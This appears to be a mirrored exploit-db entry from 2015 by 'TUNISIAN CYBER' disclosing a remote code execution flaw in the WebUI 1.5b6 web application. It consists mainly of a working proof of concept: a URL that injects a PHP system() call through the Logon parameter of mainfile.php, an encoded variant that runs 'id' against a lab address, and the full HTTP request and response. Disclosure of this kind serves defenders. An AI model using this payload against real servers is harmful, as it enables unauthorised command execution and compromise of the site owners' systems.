WebUI 1.5b6 – Remote Code Execution

  • 作者: TUNISIAN CYBER
    日期: 2015-04-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/36821/
  • #[+] Author: TUNISIAN CYBER
    #[+] Title:WebUI Remote Code Execution Vulnerability
    #[+] Date: 21-04-2015
    #[+] Vendor: https://github.com/baram01/webui/
    #[+] Type: WebAPP
    #[+] Tested on: KaliLinux (Debian)
    #[+] Twitter: @TCYB3R
    #[+] Proof of concept: http://i.imgur.com/co9Qx0n.png
    -------------------------------------------------------------------------------
    p0c:
    
    http://site/webui/mainfile.php?username=USER&password=PASSWORD&_login=1&Logon=';echo system('command');'
    
    Live HTTP Header:
    http://192.168.186.129/webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27
    
    GET /webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27 HTTP/1.1
    Host: 192.168.186.129
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    
    HTTP/1.1 200 OK
    Date: Wed, 22 Apr 2015 13:20:23 GMT
    Server: Apache/2.2.22 (Debian)
    X-Powered-By: PHP/5.4.39-0+deb7u2
    Content-Encoding: gzip
    Vary: Accept-Encoding
    Content-Length: 51
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html